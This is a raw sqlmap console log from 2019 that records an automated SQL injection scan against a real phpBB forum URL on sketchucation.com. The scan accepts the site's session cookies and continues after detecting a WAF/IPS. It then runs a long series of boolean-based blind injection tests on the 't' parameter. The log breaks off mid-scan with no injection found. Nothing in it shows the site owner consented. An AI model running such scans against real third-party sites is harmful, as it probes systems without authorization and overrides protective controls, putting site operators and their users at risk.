http://forums.sketchucation.com/viewtopic.php?t=17947<brhttp://ajax.googleapis.com/ajax';
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.10.26#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:56:15 /2019-11-08/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[20:56:15] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.10) Gecko/20070409 CentOS/1.5.0.10-2.el5.centos Firefox/1.5.0.10' from file '/root/sqlmap/data/txt/user-agents.txt'
[20:56:16] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to 'https://sketchucation.com/forums/viewtopic.php?t=17947%253Cbrhttp%253A%252F%252Fajax.googleapis.com%252Fajax%2527%253B'. Do you want to follow? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('phpbb3live868_k=;phpbb3live868_sid=24b705249fc...17dc65153f;phpbb3live868_u=1'). Do you want to use those [Y/n] Y
[20:56:19] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:56:20] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[20:56:20] [WARNING] please consider usage of tamper scripts (option '--tamper')
[20:56:20] [INFO] testing if the target URL content is stable
[20:56:22] [WARNING] GET parameter 't' does not appear to be dynamic
[20:56:25] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:56:28] [INFO] testing for SQL injection on GET parameter 't'
[20:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:59:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:01:11] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[21:04:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[21:06:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[21:07:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[21:07:39] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[21:07:56] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[21:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:09:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[21:11:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[21:12:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[21:13:31] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
